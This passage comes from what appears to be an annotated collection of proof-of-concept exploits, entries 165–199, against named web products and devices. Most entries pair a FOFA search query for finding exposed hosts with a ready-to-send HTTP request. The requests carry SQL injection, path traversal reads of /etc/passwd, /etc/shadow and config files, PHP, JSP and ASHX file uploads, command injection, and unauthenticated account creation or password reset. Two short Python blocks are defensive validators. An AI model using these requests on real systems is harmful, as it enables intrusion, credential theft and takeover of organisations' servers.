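# images and PDF only; everything else, including .jsp/.aspx/.php, is refused).
ALLOWED_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".pdf": (b"%PDF-",),
}


def vulnerable_store_path(filename, root=UPLOAD_ROOT):
    """The pattern behind the entries above: the client's file name is joined
    straight onto the upload directory, so '../../x.aspx' leaves the directory
    and 'shell.jsp' keeps its executable extension."""
    return os.path.normpath(os.path.join(root, filename))


def check_upload(filename, content, root=UPLOAD_ROOT):
    """Return (True, server_path) for an acceptable upload, else (False, reason).

    The part's Content-Type header is deliberately not an input: it is chosen by
    the client (entries 155 and 176 send PHP as image/png) and proves nothing.
    """
    name = filename.replace("\\", "/").strip()
    if not name:
        return False, "empty"
    # 1. Traversal: resolve the path lexically and require it to stay under root.
    base_dir = os.path.normpath(root)
    target = os.path.normpath(os.path.join(base_dir, name))
    if not target.startswith(base_dir + os.sep):
        return False, "traversal"
    # 2. Extension allowlist on the final component; no empty stem (".ashx")
    #    and no inner dots ("shell.php.png").
    stem, ext = os.path.splitext(os.path.basename(name))
    ext = ext.lower()
    if not stem or ext not in ALLOWED_TYPES or "." in stem:
        return False, "extension"
    # 3. The content must look like the type the extension claims.
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content"
    # 4. Never reuse the client's name: random server-side name + validated extension.
    return True, os.path.join(base_dir, secrets.token_hex(16) + ext)


if __name__ == "__main__":
    for fname, body in [("../../../../dizxdell.aspx", b"<% %>"),
                        ("kjldycpvjrm.jsp", b"nyhelxrutzwhrsvsrafb"),
                        ("logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)]:
        print(fname, "->", vulnerable_store_path(fname), "|", check_upload(fname, body))
```

Checking the extension before the magic bytes is what blocks the rename-but-keep-extension behaviour seen in entries 155 and 164, and step 4 removes the attacker's control over the final URL; the traversal check runs first so that a name like ../../x.aspx is reported for what it is.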
165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

The injection point is the sortOrder parameter, which is concatenated into the ORDER BY clause.

166. 中成科信票务管理平台 (ticketing management platform) SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

Decoded, solutionNo is ' AND 4172 IN (SELECT (CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(111)))-- bErE: an error-based probe that makes SQL Server fail to convert the string "hello" to an integer and echo it in the error.

167. 精益价值管理系统 (lean value management system) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

p=UploadFile/../Web.Config reads the application's Web.Config (typically holding connection strings) from the directory above the upload folder.

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

The path parameter is not a plain path but an application-encoded value (note the repeated PAATTP token), so signature matching on ../ does not apply here.

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

The request reaches the servlet through a /templates/attestation/../../ prefix (the same trick as entry 170); the id value adds a 5-second WAITFOR DELAY, so a delayed response confirms the injection.

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle GPS monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

The ;downloadLogger.action suffix is a servlet path parameter appended to delete.do; the ids value is a MySQL SLEEP(5) time-based probe.

172. DT-高清车牌识别摄像机 (HD license plate recognition camera) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The request line must be sent as-is; most HTTP clients collapse /../ before sending, so use a raw socket or curl --path-as-is.

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

The POST body is the file path itself, not a form field; the ../ sequences after aCSHELL/ walk out to /etc/shadow, which also shows the handler reads files as root.

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 (telecom gateway configuration management system) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

The part is declared as image/png but carries PHP; the Content-Type of a multipart part is attacker-controlled and proves nothing about the content.

177. H3C router sensitive information disclosure
Each path reaches the model's configuration file through the userLogin.asp login page, one entry per model:
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

The stored file name is taken from the part's name attribute (12234.txt), not from filename, and the %2e%2e in the path is a percent-encoded ../. Retrieve the file with:
GET /imc/primepush/%2e%2e/flex/12234.txt

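Entries 160, 169, 170, 172, 177 and 178 all reach a protected or unexpected file through a path that looks harmless before normalization: percent-encoded slashes and dots (%2F, %2e%2e), a public page such as /userLogin.asp or /templates/ as the first segment, and ../ to step back out of it. As an added example (not from the article or any of the vendors), the Python below normalizes a request path the way the file-serving layer eventually will and compares the access decision taken on the raw path with the one taken on the normalized path. The public-prefix allowlist is an assumption for the demonstration.

```python
import re
from urllib.parse import unquote

# Assumed allowlist of paths that may be requested without a session. A check
# that matches the *raw* request path against it is what the entries above abuse.
PUBLIC_PREFIXES = ("/userLogin.asp", "/templates/", "/imc/primepush/")


def normalize_path(raw_target):
    """Reduce a request target to the path the server will actually open.

    Steps: drop the query string, percent-decode until stable (so %2F, %2e%2e
    and double-encoded forms all collapse), squash repeated slashes, then
    resolve . and .. without ever rising above the root.
    """
    path = raw_target.split("?", 1)[0]
    for _ in range(3):                      # bounded: three rounds cover double encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = re.sub(r"/+", "/", path)
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()                   # at the root '..' is simply dropped
            continue
        out.append(seg)
    return "/" + "/".join(out)


def is_public(path, prefixes=PUBLIC_PREFIXES):
    return any(path.startswith(p) for p in prefixes)


def authz_decision(raw_target, prefixes=PUBLIC_PREFIXES):
    """Return (served_path, public_by_raw_check, public_by_normalized_check).

    A request where the second value is True and the third is False is an
    authentication bypass of the kind shown in entries 169, 170, 177 and 178.
    """
    raw_path = raw_target.split("?", 1)[0]
    served = normalize_path(raw_target)
    return served, is_public(raw_path, prefixes), is_public(served, prefixes)


if __name__ == "__main__":
    for t in ["/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg",
              "/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
              "/templates/attestation/../../servlet/DisplayExcelCustomReport",
              "/imc/primepush/%2e%2e/flexFileUpload"]:
        print(t, "->", authz_decision(t))
```

The defensive rule that follows: authorize on the served path, not the requested one, and decode before matching. For the file-read cases (160, 172) the same normalization, applied before the path is joined onto a document root, is what turns /etc/passwd into a request for <root>/etc/passwd.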
179. 建文工程管理系统 (engineering management system) arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

xu is an error-based MySQL injection: updatexml() raises an XPath error whose message contains the result of select user().

181. 润申信息科技企业标准化管理系统 (enterprise standardization management system) UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

The request carries no session, so anyone who can reach the handler can create an account; when checking an exposed instance, review the user table for unexpected accounts.

183. 广州图创图书馆集群管理系统 (Interlib library cluster management system) updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Oracle error-based injection through the token parameter: ctxsys.drithsx.sn() returns the result of 111111*111111 inside the error message.

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

The body is a raw SQL INSERT that the endpoint runs as given, creating a user root with password 123456 and PURVIEW 4.

185. 瑞友天翼应用虚拟化系统 (Realor application virtualization system) SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

The stacked query writes the unhex'd payload (<?php echo md5("1"); $file = __FILE__; unlink($file);) to WebRoot\plom.xgi with INTO OUTFILE, relying on the server executing .xgi as PHP; it only works when the database account has the FILE privilege and secure_file_priv does not restrict the target directory.

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power plants.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

The RANDOMBLOB/HEX/UPPER chain is the SQLite heavy-query technique: the true branch forces the engine to build and hex a 500 MB blob, and the resulting delay is the signal, since SQLite has no SLEEP().

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

Time-based variant of entry 158. The backslash (%5c) in front of the quote is the usual trick against escaping: if the application escapes the quote with a backslash, the inserted backslash is itself escaped and the quote still terminates the string; a 5-second delay confirms the injection.

188. 叁体-佳会视频会议 (video conferencing) attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

The file parameter accepts an absolute path, so no traversal sequence is needed and a ../ signature will not fire.

189. 蓝网科技临床浏览系统 (LANWON clinical browsing system) deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Stacked, time-based (SQL Server WAITFOR DELAY) injection through documentUniqueId. The endpoint's normal function is to delete a study, so probing it on a production system is potentially destructive; verify against a copy.

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

The poi value is fetched as a URL (a file:// URL is accepted); whether other schemes such as http:// are fetched too, which would make the same parameter an SSRF vector, is not shown here and is worth checking.

191. 亿赛通 electronic document security management system (CDGServer3) NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
Send the request line with the /js/../ segment exactly as written; it is part of the POC (curl collapses it unless --path-as-is is given). Time-based: the id value carries a T-SQL waitfor delay of five seconds.
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
The name query parameter supplies the extension of the stored file (.ashx); the request body is the handler source that gets written.
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
Step 1: fetch a CSRF token. The same PHPSESSID value is sent in every request of the POC.
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: put the token from step 1 into token_csrf. The param value is evaluated (the POC passes a Python os.system() call) and writes a marker into the runtime/img directory, which is served under /master/img/.
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: read the marker back. A response containing 23333333333456 confirms execution.
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present. The filename traverses into the deployed fe.war directory, so hello.jsp lands under the application's web root.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 enterprise internet behavior management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
The injected command is the name field (;uname -a;echo ); the body is JSON even though the Content-Type says form-urlencoded, and Content-Length 68 matches it exactly.
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
xgh selects the account and newPass becomes its password; the request carries no session cookie or other credential.
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
Keep the ;.js suffix on the path; it is part of the POC.
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV (aliyundrive-webdav) command injection
CVE-2024-29640
The sid value is the percent-encoded command `ls />/www/aaa.txt` followed by a space, so the listing is written to /www/aaa.txt. The POC is sent with a LuCI sysauth session cookie, i.e. as an authenticated user of the router UI.
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit system assetsmanager/upload endpoint file upload
Fofa:title="Authenticate Please!"
1. Run the POC to obtain the csfr token, use it to obtain a session cookie, then upload and request the file to see the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, containing csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from the previous step to obtain a cookie. The POC logs in as admin/admin, so the upload is only reachable where those or other known credentials are valid:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with that session cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
